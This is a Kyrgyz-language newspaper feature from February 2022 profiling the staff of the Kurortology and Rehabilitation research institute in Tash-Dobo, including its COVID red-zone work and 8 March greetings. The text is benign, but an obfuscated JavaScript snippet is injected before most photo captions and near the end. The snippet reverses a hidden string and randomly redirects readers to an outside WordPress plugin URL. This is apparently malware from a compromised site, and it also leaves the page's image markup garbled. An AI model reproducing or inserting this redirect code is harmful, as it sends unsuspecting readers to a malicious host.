ДАРЫГЕРДИН КОЛУНУН ЭМИ, ДЕН СООЛУКТУН ДЕМИ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 57

Таш-Дөбө айылындагы Курортология жана калыбына келтирүү илим-изилдөө институту пандемия учурунда жана андан кийин кандай иштеп жатат деген субкат менен атайын келип, кандай кырдаал болсо да талбай иштеп, миңдеген адамдарды дарылап жатканын көрүп, ыраазы болдук. Директору Марат Сагымбаев кадимки калбаатынан жазбай, кыйынчылыкты жеңүү менен 500дөй кызматкерди татыктуу жетектеп, Орто Азиядагы атактуу курортология институтун өнүктүрүүнүн үстүндө экен. Баса, бул институтта иштеген врачтар илим-изилдөө жагын да жакшы колго алышкан. Анын далили, курортологиянын жетекчиси, медицина илимдеринин доктору Марат Сагымбаев өткөн жылы Кыргыз Республикасынын Улуттук илимдер академиясынын анык мүчөсү болуп, академик наамын алды. 2021-жылдын 31-декабрында Президенттин Жарлыгынын негизинде «Даңк» ордени менен сыйланды. Ал практикалык ишти айкалыштырган медиктердин жаңы ачылыштарды жасоосуна бардык шартты түзүп, илимге көңүл буруу керектигин айтып, жол көрсөтүп келет. Курортологияда иштеген 5 жылдын ичинде анын жетекчилиги менен 2 докторанты илимдин доктору наамдарын алышты, дагы 4 докторанты илимдин доктору даражасын коргоонун алдында турат. Мындан улам, медицина илимине жаңылыктарды киргизүүнү каалаган, илимий иштерди жазып жаткан медиктердин саны улам өсүп баратат.

Марат Акимович бизди кучак жая тосуп алып, 8-март аялдардын эл аралык күнүнө карата басымдуу бөлүгүн аялдар түзгөн эмгек жамаатынын алдыңкы кызматкерлеринин жана ишин тың аткарып келаткан орун басарынын ишине басым жасоо керектигин айтты. Биз 600дөй адам дарыланып жаткан курортологияны кыдырып, түзүлгөн шарттар жана кызматкерлердин иши менен таанышып чыктык.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/direktordun-orun-basary-daniyar-kaskeev.jpg» alt=»» width=»194″ height=»259″ /> Данияр Каскеев — Курортология жана калыбына келтирүү илим-изилдөө институтунун директорунун атайын эсеп боюнча орун басары, медицина илимдеринин кандидаты

— Мен 2003-жылдан бери Курортологияда иштеп келатам. Башында уролог врач болуп иштесем, кийин урология бөлүмүнүн башчысы болдум. 2020-жылдан бери директордун орун басары болуп эмгектенем. Биздин институттун 65 жылдык тарыхы бар. 1957-жылы Фрунзе шаарында министрликтин токтому менен институт катары ачылып, иштеп келген. Таш-Дөбө айылындагы ушул турган имарат 1984-жылы курулуп бүтүп, республикалык калыбына келтирүү ооруканасы катары пайдаланууга берилген. Ошол мезгилден тартып Орто Азиядагы эң чоң оорукана катары аты чыгып келе жатат. Кыргыз курортология илим-изилдөө институту да Фрунзеден бул жерге 1991-жылы көчүрүлүп келген. Ошол жылдан бери Кыргыз курортология жана калыбына келтирүү илим-изилдөө институту катары иштеп келатат. Институтта 14 клиникалык бөлүм иштейт. Анда оорулардын бардык түрүнө дарылоо жүргүзүлөт. Ангионеврология, неврология, ортопедия, нейро-ортопедия, омуртка патологиясы, урология, гинекология, терапия, гасртро энтерология, пульмонология, кардиология бөлүмдөрү бар. Андан тышкары, параклиника, физиотерапия, кинезиотерапия, ийне рефлексиясы, функционалдык диагностика бөлүмдөрү, лаборатория иштейт. Илим-изилдөө институтунда бир академик — Марат Сагымбаев, медицина илиминин докторлору — Махмуд Султанмуратов, Болот Кулов, Марат Мамбетов жана 13 илимдин кандидаты бар. Келип жаткан 600 бейтап эки категорияга бөлүнөт. Биринчиси — бюджеттик, ага 310 керебет бөлүнгөн. Анда пенсионерлер, майыптыгы бар адамдар, Ооган согушунун, Апрель окуясынын катышуучулары жатып дарыланышат. Калган 290 бейтап акы төлөөчү орундарда жатышат.

2020-жылы дүйнөнү каптаган пандемиядан биздин өлкө дагы абдан жабыркады. Ошол кезде Саламаттык сактоо министрлигинин буйругу менен 2020-жылдын 29-июнунда биздин Курортология институтун кызыл зонага айландыруу чечими чыкты. Ага 300 керебет даярдадык, бирок 400 керебет бейтаптарга иштедик. Мында да өзүбүздүн врачтар, медайымдар, санитаркалар иштешти. Эки ай талбай иштөө менен 1059 бейтапты дарыладык. Билесиздер, «кара июлда» көптөгөн адамдардан айрылдык. Тилекке каршы, бизде да 36 адам кайтыш болуп кетти. Ал учурда оору жаңы болгондуктан, көп суроолор жаралган. Бирок биздин кызматкерлердин бейтаптарды дарылоосу жакшы деңгээлде болгон. Бир жыл өткөндөн кийин 2021-жылдын июль айында кайрадан коронавирус оорусунун көбөйгөнүнө байланыштуу, биздин институт июль айында экинчи жолу кызыл зонага өтүп, 300 керебет орун ачылып, 50 күндөн ашык иштедик. Анда 682 бейтапты дарылап чыктык. Экинчи жолкусу салыштырмалуу жеңил өттү. Бирок, оор акыбалда келген 21 адам ковидден кайтыш болду. Быйыл жайда кызыл зонага өтөөр-өтпөсүбүз абалга жараша болот.

Биздин институт акыркы беш жылда көптөгөн ийгиликтерге жетишти. 2020-2021-жылдары коюлган план-максаттарды коронавирус илдети бир аз артка тартканы болбосо, бир топ дурус иштер жасалды. Бюджеттин, демөөрчүлөрдүн жана өзүбүздүн каражаттардын эсебинен балдар жана санатория бөлүмдөрүнө, курортологиянын 1-кабатына ремонт жасалды, бүт бөлүмдөргө медициналык диагноз коюучу жана дарылоочу жабдуулар, аппаратуралар жаңы сатылып алынды. Сырттагы аллеялар, жолдор оңдолду, асфальт төшөлдү, бак-дарактар тигилди. Былтыр 1-июлда мамлекет тарабынан жалпы медиктердин айлыгы 50 пайызга көтөрүлгөн. Бул кызматкерлер үчүн абдан чоң түрткү болду. Быйылкы жылдын май айында дагы медиктердин жалпы айлыгы 100 пайызга көтөрүлөт деп угуп жатабыз. Биздин курортологияда бюджеттен жана бюджеттен сырткары өз эсебибизден айлык алгандар бар. Жалпы тапкан акчабыздын 40 пайызы маянага чегерилет.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/nestan-abdyldaeva1.jpg» alt=»» width=»219″ height=»292″ /> Нестан Абдылдаева — Курортологиянын ангионеврология-1 бөлүмүнүн башчысы, медицина илимдеринин кандидаты, жогорку категориядагы врач

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/ajnura-musaeva1.jpg» alt=»» width=»227″ height=»302″ /> Айнура Мусаева — Кинезиотерапия бөлүмүнүн башчысы, жогорку категориядагы врач

— Бул бөлүм бейтаптарды кыймыл-аракет менен дарылайт. Бизде 7 дене тарбия залы, 11-5 метрлик чоң бассейн, машыгуу залдар бар. Анын экөө 12-15 киши бата турган чоң залдар. Аларда 23 массажист жана эмгек терапиясын үйрөтүүчү инструкторлор иштейт. Басып жүрүүдө кыйналган бейтаптар үчүн 2-3-кабаттарга, балдар бөлүмү болгон 4-кабатка дене тарбия залдарын ачып бергенбиз. Ал жерлерге инструкторлор бир сааттан иштешет. Биздин бөлүмдө 37 кызматкер иштейт. Ар бир бейтаптын– инсульт, остеохондроз же омурткалары ооруса ошого жараша көнүгүүлөрдү жасатабыз. Дем алуу, ичеги-карын, ашказаны ооругандарга өз көнүгүүлөрү бар. Жалпы Курортологияга келген адамдар комплекстүү – медикаментоздук жана физиодарылоону алышат. Физиодарылоодон электр, суу, массаж, көнүгүүлөрдү, ийне терапиясын алышат. Ошондуктан эч качан керебеттер бош калбайт. Бири кетсе, бири келет. Бири онду чакырып келет. Кайра-кайра ар мезгилде келе бергендер бар. Ал тургай 31-декабрда келип жатышат. Бул жердин абасы, суусу таза. Республика боюнча келгендерден сырткары, мигрант болуп иштеп жүргөндөр да келип эс алып, дарыланып кетишет.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/kenzhekan-zheenbaeva1.jpg» alt=»» width=»222″ height=»296″ /> Кенжекан Жээнбаева — Жогорку категориядагы врач-гинеколог, саламаттыкты сактоонун отличниги

— Мен жалпы жонунан 41 жыл акушер-гинеколог болуп иштеп келатам. 35 жыл 4-гинекологиялык төрөт үйүндө иштеп, Медакадемиянын кафедрасында ассистент болдум. Бул жерде 6 жылдан бери иштейм. Биз курортологияга жаңы жаталы деп келген аял бейтептарды текшеребиз. Аялдардын ар биринде ар түрдүү оорулар бар экени мени таң калтырат. Акыркы 5 жылда 6 айымдан рак оорусун тапсам, акыркы бир жылда эле ал 18ге чыкты. Бул өтө коркунучтуу. Аялдар врачтарга көрүнбөй, он жылдап жүрө бергенинин кесепетинен болууда. Аялдарды мен гүлгө салыштырам, гүлгө суу куюп турбаса соолуп калган сыяктуу, айымдарды да баттан карап туруу керек. Бизден айына 800-900дөй аял текшерүүдөн өтөт. Рак оорусу чыккандарды онкологияга жөнөтөбүз. Калган ооруларын бул жактан комплекстүү дарылап жиберебиз. Аял өзүн дарылап, карап, бапестеп турса, үй-бүлөсүнө, балдарына да жакшы болот. Мен аялдарга өзүңөрдү карагыла, сактагыла, сыйлагыла деп көп айтам. Учурдан пайдаланып Умай эненин тилегин айтайын;

Бала үнү, бала күнү өчпөсүн,
Балдар тиккен балатылар гүлдөсүн.
Мен кааларым Умай эне атынан,
Бир да бала энеси жок өспөсүн,
Бир да эне баласы жок өтпөсүн.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/zinat-rajymbekova1.jpg» alt=»» width=»212″ height=»283″ /> Зинат Райымбекова — Физиотерапия бөлүмүнүн медайымы

— Мен бул жерде 1986-жылдан бери иштейм. Азыркы учурда бейтаптарга парафин коюу бөлүгүндө иштеп жатам. Бизде алты ай сайын алмаштыруу болуп турат. Физиотерапия бөлүмүнүн 24 кабинети бар, анда ар түрдүү аппараттар коюлган. Жарык, жылуу, электр токторун берген аппараттарды унутпай, улам өздөштүрүп туруу үчүн алты айда бир кызматкерлер алмашып иштешет. Баткак дарылоосу үчүн жер төлөдө баткактарды ысытып көтөрүп келген балдарды, медайымдарды, санитаркалардын баарын кошкондо жалпы жонунан бөлүмдө 50 кызматкер иштейбиз. Иштөө үчүн бардык шарттар түзүлгөн. Мага өз ишим абдан жагат. Бөлүм башчыбыз Нуржамал Арзыкуловнанын жетекчилиги менен баарыбыз ынтымактуубуз. Көпчүлүгүбүз ушул институт ачылгандан бери иштеп келатабыз. Бизге жатып кеткен бейтаптар дайыма ыраазы болуп кетишет. Адамдарга пайдабыз тийип жатат деп биз дагы сүйүнүп калабыз. Бейтаптар ден соолугун абдан жакшы чыңдашат. Үч маал берилген диеталык тамак-аштар да ден соолукка абдан пайдалуу.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/rapat-niyazalieva1.jpg» alt=»» width=»222″ height=»296″ /> Рапат Ниязалиева — Пульмонология бөлүмүнүн башчысы, жогорку категориядагы врач

— Бул өпкө оорулар бөлүмүндө 11 киши иштейбиз. Мурда терапия бөлүмү менен чогуу болчубуз, 2006-жылы өзүнчө бөлүштү. Пандемия учурунда биздин Курортология эки жыл кызыл зонага айланганда биздин бөлүм реанимация бөлүмү болуп иштеди. Бизде 28 орун бар, анын 20сы бюджеттик, мында пенсионерлер, майыптар, согуштун ардагерлери жатышат, 8и акча төлөп жаткандар. Бизде башка бөлүмдөргө караганда кислороддук аппараттар көп, дайыма иштеп турат. Бейтаптарга эмне керек болсо бардык жабдуулар менен жабдылган. Керебеттер бош калбайт, улам бири келип, кетет. Өпкөсү кагынып келген бейтаптар бизден дарыланып чыгып кеткенден кийин дагы телефон чалып, абалдарын сурап, байланышып турабыз. Ооруп жаткан болсо кайра чакырабыз.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/burmajym-sherimbekova1.jpg» alt=»» width=»215″ height=»287″ /> Бурмайым Шеримбекова — Балдар бөлүмүнүн логопед-дефектолог врачы, жогорку категориядагы врач

— Биздин балдар бөлүмүндө 45 керебет орун бар. 14 кызматкер иштейбиз. Бөлүмүбүз Түркия мамлекетинин каражатына толук ремонттон өткөн. Курортология боюнча эң мыкты бөлүм. Бизде ар түрдүү оорулар менен республиканын ар кайсы жеринен келген балдар жатып, дарыланышат. Мен логопед болгондуктан ооз көңдөйү жок, тили жакшы иштебеген, сөздөрдү жакшы сүйлөй албаган, ал тургай бир дагы сөз сүйлөй албаган балдар менен иштейм. Бул жерде 1993-жылдан бери логопед болуп иштеп келатам. Атайын балдар логопеди болуу үчүн экинчи билимди окуп, диплом алгам. Сүйлөбөй келген балдар сүйлөп баштаса, ишибиздин натыйжасына кубанабыз. Атайын логопед издеп келгендер бар. Иштеген ишиңдин жыйынтыгы чыгып турса сүйүнүп каласың. Балдар айыгып кетсе, өзүңдү керектүү кадр сезип, сыймыктанасың. Жабыркап келген балдардын көңүлүн көтөрүү үчүн майрамдарды уюштурабыз, Балдар күнүндө, Жаңы жылда администрация менен бирге белектерди беребиз. Балдардын ден соолугун комплекстүү дарылаганыбыз үчүн натыйжа чоң. Мисалы, башка ооруканаларда бир гана органын дарыласа, бул жерде кайсы гана жери оорубасын баарын дарылатып кетүүгө мүмкүн. Үч маал тамагы бар. Бардык шарттар түзүлгөн, аппаратуралар жетиштүү. 17 жашка чейинки балдардын баары бекер дарыланышат.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/ajgүl-danikulova1.jpg» alt=»» width=»209″ height=»278″ /> Айгүл Даникулова — Гастроэнтерология же ашказан, ичеги оорулар бөлүмүнүн улуу медайымы

— Бул жерде иштегениме 15 жылдай болуп калды. Институт жылына миңдеген бейтаптарды кабыл алат. Биздин бөлүмдө ашказанга зонт жуткуруу аркылуу ооруларын аныктап, врачтар менен дарылоого аракетибизди жумшайбыз. Бөлүмүбүз 40 орунга ылайыкталган. Оорулуу адамдардын көптүгүнөн бир гана ашказан же ичеги-карын ооруларын эле эмес, башка жери ооруп келгендерди кабыл алууга аргасызбыз. Анткени, орундар жетишпейт. Бүгүн эле коляскада отурган эки майып адам келип жатты. Эки жыл бою Курортология кызыл зонага айланды. Ошондо биз дагы көп тажрыйбаларды алдык, бейтаптарга колдон келген жардамыбызды бердик. Институтта жогорку категориядагы врачтар көп иштешет, илимдин кандидаттары да Кудайга шүгүр. Директорубуз баарыбызга атадай камкор, көп насааттарын айтып, ишибизди так аткаруубузду суранып, баттан кабар алып турат. Жада калса медайымдардын, кенже кызматкерлердин кийген кийимине чейин көңүл бурат. Анын медайымдардын көңүлүн көтөрүп, атайын сурап, абалыбызды билип туруусу бизге стимул берет. Бейтаптар бизге абдан көп келишет, орун жок десек капа болушат. Биздин институт мындан ары да өнүгүп-өсүп, бейтаптарга жардамын тийгизсе деп каалайм. Ага ар кимибиз өз салымыбызды кошуп келатабыз. Медайым болуп иштегениме сыймыктанам, ушул кесибимди сүйөм. Жумушка майрамга келгендей келебиз, анткени бардык шарт, сыйлап турган эмгек жамааты бар.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/ajgүl-azhykanova1.jpg» alt=»» width=»239″ height=»318″ /> Айгүл Ажыканова — Урогинекология бөлүмүнүн медайымы

— Бөлүмүбүз урология болуп эркектерди да, гинекология болуп аялдарды да дарылайбыз. 50 керебет орун бар, анын 40ы бюджеттик. Бизге бөйрөгү ооругандар келип жатканы менен аларда кант диабети, жүрөк кан тамыр оорусу, кан басымы менен жабыркагандар, грыжасы барлар көп. Аларды биз комплекстүү дарылайбыз. Ушул кесипти сүйгөнүм үчүн көп жылдан бери иштеп жүрөм. Бөлүм башчыбыз Шааркан Ташматовна баарыбыздын башыбызды бириктирип турат, ынтымакта бир команда болуп иштейбиз. Үйгө караганда бул жерде көбүрөөк жүрөбүз, күн-түндөп калабыз. 19 киши иштейбиз. Республиканын булуң-бурчунан сырткары бейтаптар Казакстан, Россиядан бери келишет. Бизге ыраазы болуп, жеңилдеп калганын айтышат. Кайра-кайра келе берген пациенттер көп. Каралбай калган Курортология четинен ремонт болуп, оңдолуп жатат. Имараттын сырткы айланасы дагы жаркырады. Ушундай ремонт биздин бөлүмгө да болот деп ишенебиз. Канчалык жаркырап турса, ошончолук натыйжа болот, ошончолук иштегиң келет. Буюрса, баары жакшы болот, бул жетекчибиз менен көп иштерди жасай алабыз деп ойлойм.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/dinara-shabyralieva1.jpg» alt=»» width=»220″ height=»293″ /> Динара Шабыралиева — Тамак-аш бөлүгүнүн диет адиси

— Курортологияда тамак-аш эки түрдүү – бюджеттик жана атайын эсепте даярдалат. Азык-түлүктөрдүн кымбаттап кеткенине байланыштуу биз дагы тамак-аштардын баасын февралдан баштап көтөрүп жатабыз. Атайын эсеп менен жаткан адамдар тамакка да өзүнчө төлөшөт. Бизде ар түрдүү оорулар менен бейтаптар көп жаткандыктан атайын ден соолукка пайдалуу диеталык тамактарды жасайбыз. Эгер бейтаптар жалаң биз даярдаган диеталык тамактар менен азыктанып, дарыланса ден соолугун абдан чыңдамак. Ар бир даярдалган тамак куурулбайт, бууга, сууга гана бышырылат. Тамак жасоочу жайда бир башчы, 5 ашпозчу, 5 ашкана кызматкери иштейт. Азык-түлүктөр тендер аркылуу алынат, өзүбүз текшерип алабыз. Азыркы жетекчибиз келгени тамак жасалуучу жай толук ремонттон өттү. Ичи аппак, жылуу. Плиталар сонун иштейт. Ысык-муздак суусу бар. Идиш-аяктарыбыздын баары кашыкка чейин жаңы алынды. Кызматкерлердин ашпозчу кийимдери жаңыланып тигилген. Айлыктарыбыз да көтөрүлдү. Кызыл зона болгон учурда да токтобой, ооруганыбызга карабай иштедик. Жумуш оор болсо да бардык шарт түзүлгөнү үчүн бул жерде иштөө биз үчүн майрам.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/esenbүbү-sabitova1.jpg» alt=»» width=»230″ height=»307″ /> Эсенбүбү Сабитова — Ийне рефлекси терапиясынын бөлүм башчысы, жогорку категориядагы врач

— Кытай ыкмасы менен денеге ийнелерди же кыргызча айтканда алтын ийнелерди сайууну өздөштүрүп, иштеп келатканыма 20 жылдай болду. Өзүм кардиолог-терапевт врачымын. Бул жерде ийне терапиясы бөлүмүнүн ачылганына 7-8 жылдай болду. Ийнелерди Кытайдан буйрутма менен алдырабыз. Ийнелерди жана кол каптарды бир жолу эле пайдаланып ыргытабыз, алар утилизация бөлүмүнө кетет. Бөлүмүбүздө 6 врач эмгектенет, ийне терапиясы боюнча курстарды окуп бүтүшкөн. Ар бир 5 жыл сайын курстардан окуп турабыз. Ийне көп ооруларга колдонулат. Курортологияда 14 бөлүм бар, ошолордо жаткан бейтаптардын 80-90 пайызы бизге келип ийне сайдырышат. Адамда 12 орган бар, ошонун бири баланстан чыкканда адам ооруп калат. Ар бир органдын өз каналдары бар, ошол каналдардагы активдүү точкалар аркылуу организмге ийне сайып, таасир беребиз. Органдын ички жана сырткы бузулуусун ийне аркылуу калыбына келтиребиз. Жылдан-жылга ийне сайдырууну каалагандар көп. Сырттан келип сайдырып кеткендер да бар. Мурда 3 врач иштесек, азыр 6 врач болдук. Азыркы жетекчибиздин иш билгилиги менен көп жакшы иштер болууда. Кабинеттерибиз жарык, жылуу. Бул жумуш өзүмө абдан жагат.


$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/ajnura-zhumasheva1.jpg» alt=»» width=»215″ height=»287″ /> Айнура Жумашева — Омурткалар патологиясы бөлүмүнүн улуу медайымы

— Мен 2014-жылдан бери бул жерде иштеп жатам, бирок медайым катары иштегениме 10 жылдан ашып калды. Бизде негизинен грыжа, сколиоз менен ооругандар, травмадан кийин ден соолугун чыңдайм деген бейтаптар жатышат. Бөлүмдө 16 кызматкер иштейбиз. 49 керебет орунубуз бар. Бөлүм башчыбыз Курстан Рыспаев медицина илимдеринин кандидаты, стажы 10 жылдан ашып калды. Бөлүмүбүздү жакында ремонттон өткөрүп алдык. Бардык шарттар түзүлгөн. Бейтаптар дарыланып кеткичекти күлүп-жайнап, жакшы карайбыз. Бизден жакшы болуп сакайып кеткендер көп. Чет өлкөдөн да келип дарыланышат.

 Курортология илим-изилдөө институтунун директорунун орун басары, жогорку категориядагы врач, медицина илимдеринин кандидаты Каскеев Данияр Мамбеталиевич жөнүндө азыноолак сөз кылгым келди. Анткени, ал жөнүндө кесиптештеринен көптөгөн жылуу пикирлерди уктум. 2003-жылы курортологияга жумушка орношкон. 20 жылдан бери урология бөлүмүндө алгач врач, андан кийин бөлүм башчы, кийин директордун орун басары кызматтарын басып өтүп, өзүнүн туруктуулугун, сөзгө бекемдигин, иштин майын чыгара иштеген кызматкер экенин далилдеген. Мүнөзү оор-басырыктуу, келечектен көптү үмүттөндүргөн Данияр Мамбеталиевич доктордук диссертациясын жактоонун алдында турат. Анын темасы – урологиядагы оңойлук менен эч ким батына албай турган табарсык оорусуна байланыштуу татаал изилдөө. Буга чейин ооруга байланышкан өзүнүн ачылыштарын патент катары каттаткан, илимий диссертациясын жазып бүткөн. Эмдиги жылы доктордук диссертациясын жактап калса, институт үчүн утуш болот. Дагы бир илимдин доктору институттагы иштин натыйжалуулугун арттырат. Үч баласы бар, келинчеги да врач. Курортологиядагы эмгек жамаатынын алдында кадыр-баркка ээ. Директору мындай орун басары менен сыймыктанаарын айтты.

Курортология жана калыбына келтирүү илим-изилдөө институтунун директору Марат Акимович, анын ишин жеңилдетип, уучун узарткан орун басарлары, илимдин доктор, кандидаттары, врач-медайымдары, кенже кызматкерлери ынтымакта, муштумдай түйүлүп бир команда болуп иштеп турганда Курортология гүлдөп-өнүгүп, алдына койгон максаттарына жетет деп терең ишенем. Гезиттин окурмандарынын атынан Курортологиянын жалпы жамаатын, анын басымдуу бөлүгүн ээлеген аял дарыгерлерин, жалпы айымдарын алдыда келаткан 8-март эл аралык майрамы менен кызуу куттуктап, узун өмүр, бакубат жашоо каалайбыз.

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Сымбат Максутова

25-февраль, 2022-ж. / Редакция / Жаңылыктар 57
Бөлүшүү: Telegram WhatsApp X